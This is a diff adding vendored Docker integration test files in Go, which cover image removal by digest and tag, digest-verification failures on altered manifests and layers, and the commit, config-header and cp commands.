+	dockerCmd(c, "tag", imageReference, repoName+":sometag")
+
+	imageID := inspectField(c, imageReference, "Id")
+
+	dockerCmd(c, "rmi", imageID)
+
+	_, err = inspectFieldWithError(imageID, "Id")
+	c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted"))
+}
+
+func (s *DockerRegistrySuite) TestDeleteImageWithDigestAndTag(c *check.C) {
+	pushDigest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	// pull from the registry using the <name>@<digest> reference
+	imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest)
+	dockerCmd(c, "pull", imageReference)
+
+	imageID := inspectField(c, imageReference, "Id")
+
+	repoTag := repoName + ":sometag"
+	repoTag2 := repoName + ":othertag"
+	dockerCmd(c, "tag", imageReference, repoTag)
+	dockerCmd(c, "tag", imageReference, repoTag2)
+
+	dockerCmd(c, "rmi", repoTag2)
+
+	// rmi should have deleted only repoTag2, because there's another tag
+	inspectField(c, repoTag, "Id")
+
+	dockerCmd(c, "rmi", repoTag)
+
+	// rmi should have deleted the tag, the digest reference, and the image itself
+	_, err = inspectFieldWithError(imageID, "Id")
+	c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted"))
+}
+
+func (s *DockerRegistrySuite) TestDeleteImageWithDigestAndMultiRepoTag(c *check.C) {
+	pushDigest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	repo2 := fmt.Sprintf("%s/%s", repoName, "repo2")
+
+	// pull from the registry using the <name>@<digest> reference
+	imageReference := fmt.Sprintf("%s@%s", repoName, pushDigest)
+	dockerCmd(c, "pull", imageReference)
+
+	imageID := inspectField(c, imageReference, "Id")
+
+	repoTag := repoName + ":sometag"
+	repoTag2 := repo2 + ":othertag"
+	dockerCmd(c, "tag", imageReference, repoTag)
+	dockerCmd(c, "tag", imageReference, repoTag2)
+
+	dockerCmd(c, "rmi", repoTag)
+
+	// rmi should have deleted repoTag and image reference, but left repoTag2
+	inspectField(c, repoTag2, "Id")
+	_, err = inspectFieldWithError(imageReference, "Id")
+	c.Assert(err, checker.NotNil, check.Commentf("image digest reference should have been removed"))
+
+	_, err = inspectFieldWithError(repoTag, "Id")
+	c.Assert(err, checker.NotNil, check.Commentf("image tag reference should have been removed"))
+
+	dockerCmd(c, "rmi", repoTag2)
+
+	// rmi should have deleted the tag, the digest reference, and the image itself
+	_, err = inspectFieldWithError(imageID, "Id")
+	c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted"))
+}
+
+// TestPullFailsWithAlteredManifest tests that a `docker pull` fails when
+// we have modified a manifest blob and its digest cannot be verified.
+// This is the schema2 version of the test.
+func (s *DockerRegistrySuite) TestPullFailsWithAlteredManifest(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	manifestDigest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	// Load the target manifest blob.
+	manifestBlob := s.reg.readBlobContents(c, manifestDigest)
+
+	var imgManifest schema2.Manifest
+	err = json.Unmarshal(manifestBlob, &imgManifest)
+	c.Assert(err, checker.IsNil, check.Commentf("unable to decode image manifest from blob"))
+
+	// Change a layer in the manifest.
+	imgManifest.Layers[0].Digest = digest.Digest("sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef")
+
+	// Move the existing data file aside, so that we can replace it with a
+	// malicious blob of data. NOTE: we defer the returned undo func.
+	undo := s.reg.tempMoveBlobData(c, manifestDigest)
+	defer undo()
+
+	alteredManifestBlob, err := json.MarshalIndent(imgManifest, "", "   ")
+	c.Assert(err, checker.IsNil, check.Commentf("unable to encode altered image manifest to JSON"))
+
+	s.reg.writeBlobContents(c, manifestDigest, alteredManifestBlob)
+
+	// Now try pulling that image by digest. We should get an error about
+	// digest verification for the manifest digest.
+
+	// Pull from the registry using the <name>@<digest> reference.
+	imageReference := fmt.Sprintf("%s@%s", repoName, manifestDigest)
+	out, exitStatus, _ := dockerCmdWithError("pull", imageReference)
+	c.Assert(exitStatus, checker.Not(check.Equals), 0)
+
+	expectedErrorMsg := fmt.Sprintf("manifest verification failed for digest %s", manifestDigest)
+	c.Assert(out, checker.Contains, expectedErrorMsg)
+}
+
+// TestPullFailsWithAlteredManifest tests that a `docker pull` fails when
+// we have modified a manifest blob and its digest cannot be verified.
+// This is the schema1 version of the test.
+func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredManifest(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	manifestDigest, err := setupImage(c)
+	c.Assert(err, checker.IsNil, check.Commentf("error setting up image"))
+
+	// Load the target manifest blob.
+	manifestBlob := s.reg.readBlobContents(c, manifestDigest)
+
+	var imgManifest schema1.Manifest
+	err = json.Unmarshal(manifestBlob, &imgManifest)
+	c.Assert(err, checker.IsNil, check.Commentf("unable to decode image manifest from blob"))
+
+	// Change a layer in the manifest.
+	imgManifest.FSLayers[0] = schema1.FSLayer{
+		BlobSum: digest.Digest("sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"),
+	}
+
+	// Move the existing data file aside, so that we can replace it with a
+	// malicious blob of data. NOTE: we defer the returned undo func.
+	undo := s.reg.tempMoveBlobData(c, manifestDigest)
+	defer undo()
+
+	alteredManifestBlob, err := json.MarshalIndent(imgManifest, "", "   ")
+	c.Assert(err, checker.IsNil, check.Commentf("unable to encode altered image manifest to JSON"))
+
+	s.reg.writeBlobContents(c, manifestDigest, alteredManifestBlob)
+
+	// Now try pulling that image by digest. We should get an error about
+	// digest verification for the manifest digest.
+
+	// Pull from the registry using the <name>@<digest> reference.
+	imageReference := fmt.Sprintf("%s@%s", repoName, manifestDigest)
+	out, exitStatus, _ := dockerCmdWithError("pull", imageReference)
+	c.Assert(exitStatus, checker.Not(check.Equals), 0)
+
+	expectedErrorMsg := fmt.Sprintf("image verification failed for digest %s", manifestDigest)
+	c.Assert(out, checker.Contains, expectedErrorMsg)
+}
+
+// TestPullFailsWithAlteredLayer tests that a `docker pull` fails when
+// we have modified a layer blob and its digest cannot be verified.
+// This is the schema2 version of the test.
+func (s *DockerRegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	manifestDigest, err := setupImage(c)
+	c.Assert(err, checker.IsNil)
+
+	// Load the target manifest blob.
+	manifestBlob := s.reg.readBlobContents(c, manifestDigest)
+
+	var imgManifest schema2.Manifest
+	err = json.Unmarshal(manifestBlob, &imgManifest)
+	c.Assert(err, checker.IsNil)
+
+	// Next, get the digest of one of the layers from the manifest.
+	targetLayerDigest := imgManifest.Layers[0].Digest
+
+	// Move the existing data file aside, so that we can replace it with a
+	// malicious blob of data. NOTE: we defer the returned undo func.
+	undo := s.reg.tempMoveBlobData(c, targetLayerDigest)
+	defer undo()
+
+	// Now make a fake data blob in this directory.
+	s.reg.writeBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for."))
+
+	// Now try pulling that image by digest. We should get an error about
+	// digest verification for the target layer digest.
+
+	// Remove distribution cache to force a re-pull of the blobs
+	if err := os.RemoveAll(filepath.Join(dockerBasePath, "image", s.d.storageDriver, "distribution")); err != nil {
+		c.Fatalf("error clearing distribution cache: %v", err)
+	}
+
+	// Pull from the registry using the <name>@<digest> reference.
+	imageReference := fmt.Sprintf("%s@%s", repoName, manifestDigest)
+	out, exitStatus, _ := dockerCmdWithError("pull", imageReference)
+	c.Assert(exitStatus, checker.Not(check.Equals), 0, check.Commentf("expected a non-zero exit status"))
+
+	expectedErrorMsg := fmt.Sprintf("filesystem layer verification failed for digest %s", targetLayerDigest)
+	c.Assert(out, checker.Contains, expectedErrorMsg, check.Commentf("expected error message in output: %s", out))
+}
+
+// TestPullFailsWithAlteredLayer tests that a `docker pull` fails when
+// we have modified a layer blob and its digest cannot be verified.
+// This is the schema1 version of the test.
+func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	manifestDigest, err := setupImage(c)
+	c.Assert(err, checker.IsNil)
+
+	// Load the target manifest blob.
+	manifestBlob := s.reg.readBlobContents(c, manifestDigest)
+
+	var imgManifest schema1.Manifest
+	err = json.Unmarshal(manifestBlob, &imgManifest)
+	c.Assert(err, checker.IsNil)
+
+	// Next, get the digest of one of the layers from the manifest.
+	targetLayerDigest := imgManifest.FSLayers[0].BlobSum
+
+	// Move the existing data file aside, so that we can replace it with a
+	// malicious blob of data. NOTE: we defer the returned undo func.
+	undo := s.reg.tempMoveBlobData(c, targetLayerDigest)
+	defer undo()
+
+	// Now make a fake data blob in this directory.
+	s.reg.writeBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for."))
+
+	// Now try pulling that image by digest. We should get an error about
+	// digest verification for the target layer digest.
+
+	// Remove distribution cache to force a re-pull of the blobs
+	if err := os.RemoveAll(filepath.Join(dockerBasePath, "image", s.d.storageDriver, "distribution")); err != nil {
+		c.Fatalf("error clearing distribution cache: %v", err)
+	}
+
+	// Pull from the registry using the <name>@<digest> reference.
+	imageReference := fmt.Sprintf("%s@%s", repoName, manifestDigest)
+	out, exitStatus, _ := dockerCmdWithError("pull", imageReference)
+	c.Assert(exitStatus, checker.Not(check.Equals), 0, check.Commentf("expected a non-zero exit status"))
+
+	expectedErrorMsg := fmt.Sprintf("filesystem layer verification failed for digest %s", targetLayerDigest)
+	c.Assert(out, checker.Contains, expectedErrorMsg, check.Commentf("expected error message in output: %s", out))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go
new file mode 100644
index 0000000000..8008ae1716
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go
@@ -0,0 +1,157 @@
+package main
+
+import (
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestCommitAfterContainerIsDone(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-i", "-a", "stdin", "busybox", "echo", "foo")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	dockerCmd(c, "wait", cleanedContainerID)
+
+	out, _ = dockerCmd(c, "commit", cleanedContainerID)
+
+	cleanedImageID := strings.TrimSpace(out)
+
+	dockerCmd(c, "inspect", cleanedImageID)
+}
+
+func (s *DockerSuite) TestCommitWithoutPause(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-i", "-a", "stdin", "busybox", "echo", "foo")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	dockerCmd(c, "wait", cleanedContainerID)
+
+	out, _ = dockerCmd(c, "commit", "-p=false", cleanedContainerID)
+
+	cleanedImageID := strings.TrimSpace(out)
+
+	dockerCmd(c, "inspect", cleanedImageID)
+}
+
+//test commit a paused container should not unpause it after commit
+func (s *DockerSuite) TestCommitPausedContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	defer unpauseAllContainers()
+	out, _ := dockerCmd(c, "run", "-i", "-d", "busybox")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	dockerCmd(c, "pause", cleanedContainerID)
+
+	out, _ = dockerCmd(c, "commit", cleanedContainerID)
+
+	out = inspectField(c, cleanedContainerID, "State.Paused")
+	// commit should not unpause a paused container
+	c.Assert(out, checker.Contains, "true")
+}
+
+func (s *DockerSuite) TestCommitNewFile(c *check.C) {
+	dockerCmd(c, "run", "--name", "commiter", "busybox", "/bin/sh", "-c", "echo koye > /foo")
+
+	imageID, _ := dockerCmd(c, "commit", "commiter")
+	imageID = strings.TrimSpace(imageID)
+
+	out, _ := dockerCmd(c, "run", imageID, "cat", "/foo")
+	actual := strings.TrimSpace(out)
+	c.Assert(actual, checker.Equals, "koye")
+}
+
+func (s *DockerSuite) TestCommitHardlink(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	firstOutput, _ := dockerCmd(c, "run", "-t", "--name", "hardlinks", "busybox", "sh", "-c", "touch file1 && ln file1 file2 && ls -di file1 file2")
+
+	chunks := strings.Split(strings.TrimSpace(firstOutput), " ")
+	inode := chunks[0]
+	chunks = strings.SplitAfterN(strings.TrimSpace(firstOutput), " ", 2)
+	c.Assert(chunks[1], checker.Contains, chunks[0], check.Commentf("Failed to create hardlink in a container. Expected to find %q in %q", inode, chunks[1:]))
+
+	imageID, _ := dockerCmd(c, "commit", "hardlinks", "hardlinks")
+	imageID = strings.TrimSpace(imageID)
+
+	secondOutput, _ := dockerCmd(c, "run", "-t", "hardlinks", "ls", "-di", "file1", "file2")
+
+	chunks = strings.Split(strings.TrimSpace(secondOutput), " ")
+	inode = chunks[0]
+	chunks = strings.SplitAfterN(strings.TrimSpace(secondOutput), " ", 2)
+	c.Assert(chunks[1], checker.Contains, chunks[0], check.Commentf("Failed to create hardlink in a container. Expected to find %q in %q", inode, chunks[1:]))
+}
+
+func (s *DockerSuite) TestCommitTTY(c *check.C) {
+	dockerCmd(c, "run", "-t", "--name", "tty", "busybox", "/bin/ls")
+
+	imageID, _ := dockerCmd(c, "commit", "tty", "ttytest")
+	imageID = strings.TrimSpace(imageID)
+
+	dockerCmd(c, "run", "ttytest", "/bin/ls")
+}
+
+func (s *DockerSuite) TestCommitWithHostBindMount(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "--name", "bind-commit", "-v", "/dev/null:/winning", "busybox", "true")
+
+	imageID, _ := dockerCmd(c, "commit", "bind-commit", "bindtest")
+	imageID = strings.TrimSpace(imageID)
+
+	dockerCmd(c, "run", "bindtest", "true")
+}
+
+func (s *DockerSuite) TestCommitChange(c *check.C) {
+	dockerCmd(c, "run", "--name", "test", "busybox", "true")
+
+	imageID, _ := dockerCmd(c, "commit",
+		"--change", "EXPOSE 8080",
+		"--change", "ENV DEBUG true",
+		"--change", "ENV test 1",
+		"--change", "ENV PATH /foo",
+		"--change", "LABEL foo bar",
+		"--change", "CMD [\"/bin/sh\"]",
+		"--change", "WORKDIR /opt",
+		"--change", "ENTRYPOINT [\"/bin/sh\"]",
+		"--change", "USER testuser",
+		"--change", "VOLUME /var/lib/docker",
+		"--change", "ONBUILD /usr/local/bin/python-build --dir /app/src",
+		"test", "test-commit")
+	imageID = strings.TrimSpace(imageID)
+
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+	prefix = strings.ToUpper(prefix) // Force C: as that's how WORKDIR is normalised on Windows
+	expected := map[string]string{
+		"Config.ExposedPorts": "map[8080/tcp:{}]",
+		"Config.Env":          "[DEBUG=true test=1 PATH=/foo]",
+		"Config.Labels":       "map[foo:bar]",
+		"Config.Cmd":          "[/bin/sh]",
+		"Config.WorkingDir":   prefix + slash + "opt",
+		"Config.Entrypoint":   "[/bin/sh]",
+		"Config.User":         "testuser",
+		"Config.Volumes":      "map[/var/lib/docker:{}]",
+		"Config.OnBuild":      "[/usr/local/bin/python-build --dir /app/src]",
+	}
+
+	for conf, value := range expected {
+		res := inspectField(c, imageID, conf)
+		if res != value {
+			c.Errorf("%s('%s'), expected %s", conf, res, value)
+		}
+	}
+}
+
+func (s *DockerSuite) TestCommitChangeLabels(c *check.C) {
+	dockerCmd(c, "run", "--name", "test", "--label", "some=label", "busybox", "true")
+
+	imageID, _ := dockerCmd(c, "commit",
+		"--change", "LABEL some=label2",
+		"test", "test-commit")
+	imageID = strings.TrimSpace(imageID)
+
+	c.Assert(inspectField(c, imageID, "Config.Labels"), checker.Equals, "map[some:label2]")
+	// check that container labels didn't change
+	c.Assert(inspectField(c, "test", "Config.Labels"), checker.Equals, "map[some:label]")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go
new file mode 100644
index 0000000000..1d5e5ad3db
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go
@@ -0,0 +1,140 @@
+package main
+
+import (
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"runtime"
+
+	"github.com/docker/docker/api"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/pkg/homedir"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestConfigHTTPHeader(c *check.C) {
+	testRequires(c, UnixCli) // Can't set/unset HOME on windows right now
+	// We either need a level of Go that supports Unsetenv (for cases
+	// when HOME/USERPROFILE isn't set), or we need to be able to use
+	// os/user but user.Current() only works if we aren't statically compiling
+
+	var headers map[string][]string
+
+	server := httptest.NewServer(http.HandlerFunc(
+		func(w http.ResponseWriter, r *http.Request) {
+			w.Header().Set("API-Version", api.DefaultVersion)
+			headers = r.Header
+		}))
+	defer server.Close()
+
+	homeKey := homedir.Key()
+	homeVal := homedir.Get()
+	tmpDir, err := ioutil.TempDir("", "fake-home")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(tmpDir)
+
+	dotDocker := filepath.Join(tmpDir, ".docker")
+	os.Mkdir(dotDocker, 0600)
+	tmpCfg := filepath.Join(dotDocker, "config.json")
+
+	defer func() { os.Setenv(homeKey, homeVal) }()
+	os.Setenv(homeKey, tmpDir)
+
+	data := `{
+		"HttpHeaders": { "MyHeader": "MyValue" }
+	}`
+
+	err = ioutil.WriteFile(tmpCfg, []byte(data), 0600)
+	c.Assert(err, checker.IsNil)
+
+	cmd := exec.Command(dockerBinary, "-H="+server.URL[7:], "ps")
+	out, _, _ := runCommandWithOutput(cmd)
+
+	c.Assert(headers["User-Agent"], checker.NotNil, check.Commentf("Missing User-Agent"))
+
+	c.Assert(headers["User-Agent"][0], checker.Equals, "Docker-Client/"+dockerversion.Version+" ("+runtime.GOOS+")", check.Commentf("Badly formatted User-Agent,out:%v", out))
+
+	c.Assert(headers["Myheader"], checker.NotNil)
+	c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("Missing/bad header,out:%v", out))
+
+}
+
+func (s *DockerSuite) TestConfigDir(c *check.C) {
+	cDir, err := ioutil.TempDir("", "fake-home")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(cDir)
+
+	// First make sure pointing to empty dir doesn't generate an error
+	dockerCmd(c, "--config", cDir, "ps")
+
+	// Test with env var too
+	cmd := exec.Command(dockerBinary, "ps")
+	cmd.Env = appendBaseEnv(true, "DOCKER_CONFIG="+cDir)
+	out, _, err := runCommandWithOutput(cmd)
+
+	c.Assert(err, checker.IsNil, check.Commentf("ps2 didn't work,out:%v", out))
+
+	// Start a server so we can check to see if the config file was
+	// loaded properly
+	var headers map[string][]string
+
+	server := httptest.NewServer(http.HandlerFunc(
+		func(w http.ResponseWriter, r *http.Request) {
+			headers = r.Header
+		}))
+	defer server.Close()
+
+	// Create a dummy config file in our new config dir
+	data := `{
+		"HttpHeaders": { "MyHeader": "MyValue" }
+	}`
+
+	tmpCfg := filepath.Join(cDir, "config.json")
+	err = ioutil.WriteFile(tmpCfg, []byte(data), 0600)
+	c.Assert(err, checker.IsNil, check.Commentf("Err creating file"))
+
+	env := appendBaseEnv(false)
+
+	cmd = exec.Command(dockerBinary, "--config", cDir, "-H="+server.URL[7:], "ps")
+	cmd.Env = env
+	out, _, err = runCommandWithOutput(cmd)
+
+	c.Assert(err, checker.NotNil, check.Commentf("out:%v", out))
+	c.Assert(headers["Myheader"], checker.NotNil)
+	c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps3 - Missing header,out:%v", out))
+
+	// Reset headers and try again using env var this time
+	headers = map[string][]string{}
+	cmd = exec.Command(dockerBinary, "-H="+server.URL[7:], "ps")
+	cmd.Env = append(env, "DOCKER_CONFIG="+cDir)
+	out, _, err = runCommandWithOutput(cmd)
+
+	c.Assert(err, checker.NotNil, check.Commentf("%v", out))
+	c.Assert(headers["Myheader"], checker.NotNil)
+	c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps4 - Missing header,out:%v", out))
+
+	// Reset headers and make sure flag overrides the env var
+	headers = map[string][]string{}
+	cmd = exec.Command(dockerBinary, "--config", cDir, "-H="+server.URL[7:], "ps")
+	cmd.Env = append(env, "DOCKER_CONFIG=MissingDir")
+	out, _, err = runCommandWithOutput(cmd)
+
+	c.Assert(err, checker.NotNil, check.Commentf("out:%v", out))
+	c.Assert(headers["Myheader"], checker.NotNil)
+	c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps5 - Missing header,out:%v", out))
+
+	// Reset headers and make sure flag overrides the env var.
+	// Almost same as previous but make sure the "MissingDir" isn't
+	// ignore - we don't want to default back to the env var.
+	headers = map[string][]string{}
+	cmd = exec.Command(dockerBinary, "--config", "MissingDir", "-H="+server.URL[7:], "ps")
+	cmd.Env = append(env, "DOCKER_CONFIG="+cDir)
+	out, _, err = runCommandWithOutput(cmd)
+
+	c.Assert(err, checker.NotNil, check.Commentf("out:%v", out))
+	c.Assert(headers["Myheader"], checker.IsNil, check.Commentf("ps6 - Headers shouldn't be the expected value,out:%v", out))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go
new file mode 100644
index 0000000000..9ed7e8c720
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go
@@ -0,0 +1,488 @@
+package main
+
+import (
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// docker cp CONTAINER:PATH LOCALPATH
+
+// Try all of the test cases from the archive package which implements the
+// internals of `docker cp` and ensure that the behavior matches when actually
+// copying to and from containers.
+
+// Basic assumptions about SRC and DST:
+// 1. SRC must exist.
+// 2. If SRC ends with a trailing separator, it must be a directory.
+// 3. DST parent directory must exist.
+// 4. If DST exists as a file, it must not end with a trailing separator.
+
+// First get these easy error cases out of the way.
+
+// Test for error when SRC does not exist.
+func (s *DockerSuite) TestCpFromErrSrcNotExists(c *check.C) {
+	containerID := makeTestContainer(c, testContainerOptions{})
+
+	tmpDir := getTestDir(c, "test-cp-from-err-src-not-exists")
+	defer os.RemoveAll(tmpDir)
+
+	err := runDockerCp(c, containerCpPath(containerID, "file1"), tmpDir)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err))
+}
+
+// Test for error when SRC ends in a trailing
+// path separator but it exists as a file.
+func (s *DockerSuite) TestCpFromErrSrcNotDir(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
+
+	tmpDir := getTestDir(c, "test-cp-from-err-src-not-dir")
+	defer os.RemoveAll(tmpDir)
+
+	err := runDockerCp(c, containerCpPathTrailingSep(containerID, "file1"), tmpDir)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err))
+}
+
+// Test for error when SRC is a valid file or directory,
+// bu the DST parent directory does not exist.
+func (s *DockerSuite) TestCpFromErrDstParentNotExists(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
+
+	tmpDir := getTestDir(c, "test-cp-from-err-dst-parent-not-exists")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	// Try with a file source.
+	srcPath := containerCpPath(containerID, "/file1")
+	dstPath := cpPath(tmpDir, "notExists", "file1")
+
+	err := runDockerCp(c, srcPath, dstPath)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err))
+
+	// Try with a directory source.
+	srcPath = containerCpPath(containerID, "/dir1")
+
+	err = runDockerCp(c, srcPath, dstPath)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err))
+}
+
+// Test for error when DST ends in a trailing
+// path separator but exists as a file.
+func (s *DockerSuite) TestCpFromErrDstNotDir(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
+
+	tmpDir := getTestDir(c, "test-cp-from-err-dst-not-dir")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	// Try with a file source.
+	srcPath := containerCpPath(containerID, "/file1")
+	dstPath := cpPathTrailingSep(tmpDir, "file1")
+
+	err := runDockerCp(c, srcPath, dstPath)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err))
+
+	// Try with a directory source.
+	srcPath = containerCpPath(containerID, "/dir1")
+
+	err = runDockerCp(c, srcPath, dstPath)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err))
+}
+
+// Check that copying from a container to a local symlink copies to the symlink
+// target and does not overwrite the local symlink itself.
+func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
+
+	tmpDir := getTestDir(c, "test-cp-from-err-dst-not-dir")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	// First, copy a file from the container to a symlink to a file. This
+	// should overwrite the symlink target contents with the source contents.
+	srcPath := containerCpPath(containerID, "/file2")
+	dstPath := cpPath(tmpDir, "symlinkToFile1")
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	// The symlink should not have been modified.
+	c.Assert(symlinkTargetEquals(c, dstPath, "file1"), checker.IsNil)
+
+	// The file should have the contents of "file2" now.
+	c.Assert(fileContentEquals(c, cpPath(tmpDir, "file1"), "file2\n"), checker.IsNil)
+
+	// Next, copy a file from the container to a symlink to a directory. This
+	// should copy the file into the symlink target directory.
+	dstPath = cpPath(tmpDir, "symlinkToDir1")
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	// The symlink should not have been modified.
+	c.Assert(symlinkTargetEquals(c, dstPath, "dir1"), checker.IsNil)
+
+	// The file should have the contents of "file2" now.
+	c.Assert(fileContentEquals(c, cpPath(tmpDir, "file2"), "file2\n"), checker.IsNil)
+
+	// Next, copy a file from the container to a symlink to a file that does
+	// not exist (a broken symlink). This should create the target file with
+	// the contents of the source file.
+	dstPath = cpPath(tmpDir, "brokenSymlinkToFileX")
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	// The symlink should not have been modified.
+	c.Assert(symlinkTargetEquals(c, dstPath, "fileX"), checker.IsNil)
+
+	// The file should have the contents of "file2" now.
+	c.Assert(fileContentEquals(c, cpPath(tmpDir, "fileX"), "file2\n"), checker.IsNil)
+
+	// Next, copy a directory from the container to a symlink to a local
+	// directory. This should copy the directory into the symlink target
+	// directory and not modify the symlink.
+	srcPath = containerCpPath(containerID, "/dir2")
+	dstPath = cpPath(tmpDir, "symlinkToDir1")
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	// The symlink should not have been modified.
+	c.Assert(symlinkTargetEquals(c, dstPath, "dir1"), checker.IsNil)
+
+	// The directory should now contain a copy of "dir2".
+	c.Assert(fileContentEquals(c, cpPath(tmpDir, "dir1/dir2/file2-1"), "file2-1\n"), checker.IsNil)
+
+	// Next, copy a directory from the container to a symlink to a local
+	// directory that does not exist (a broken symlink). This should create
+	// the target as a directory with the contents of the source directory. It
+	// should not modify the symlink.
+	dstPath = cpPath(tmpDir, "brokenSymlinkToDirX")
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	// The symlink should not have been modified.
+	c.Assert(symlinkTargetEquals(c, dstPath, "dirX"), checker.IsNil)
+
+	// The "dirX" directory should now be a copy of "dir2".
+	c.Assert(fileContentEquals(c, cpPath(tmpDir, "dirX/file2-1"), "file2-1\n"), checker.IsNil)
+}
+
+// Possibilities are reduced to the remaining 10 cases:
+//
+//  case | srcIsDir | onlyDirContents | dstExists | dstIsDir | dstTrSep | action
+// ===================================================================================================
+//   A   |  no      |  -              |  no       |  -       |  no      |  create file
+//   B   |  no      |  -              |  no       |  -       |  yes     |  error
+//   C   |  no      |  -              |  yes      |  no      |  -       |  overwrite file
+//   D   |  no      |  -              |  yes      |  yes     |  -       |  create file in dst dir
+//   E   |  yes     |  no             |  no       |  -       |  -       |  create dir, copy contents
+//   F   |  yes     |  no             |  yes      |  no      |  -       |  error
+//   G   |  yes     |  no             |  yes      |  yes     |  -       |  copy dir and contents
+//   H   |  yes     |  yes            |  no       |  -       |  -       |  create dir, copy contents
+//   I   |  yes     |  yes            |  yes      |  no      |  -       |  error
+//   J   |  yes     |  yes            |  yes      |  yes     |  -       |  copy dir contents
+//
+
+// A. SRC specifies a file and DST (no trailing path separator) doesn't
+//    exist. This should create a file with the name DST and copy the
+//    contents of the source file into it.
+func (s *DockerSuite) TestCpFromCaseA(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{
+		addContent: true, workDir: "/root",
+	})
+
+	tmpDir := getTestDir(c, "test-cp-from-case-a")
+	defer os.RemoveAll(tmpDir)
+
+	srcPath := containerCpPath(containerID, "/root/file1")
+	dstPath := cpPath(tmpDir, "itWorks.txt")
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil)
+}
+
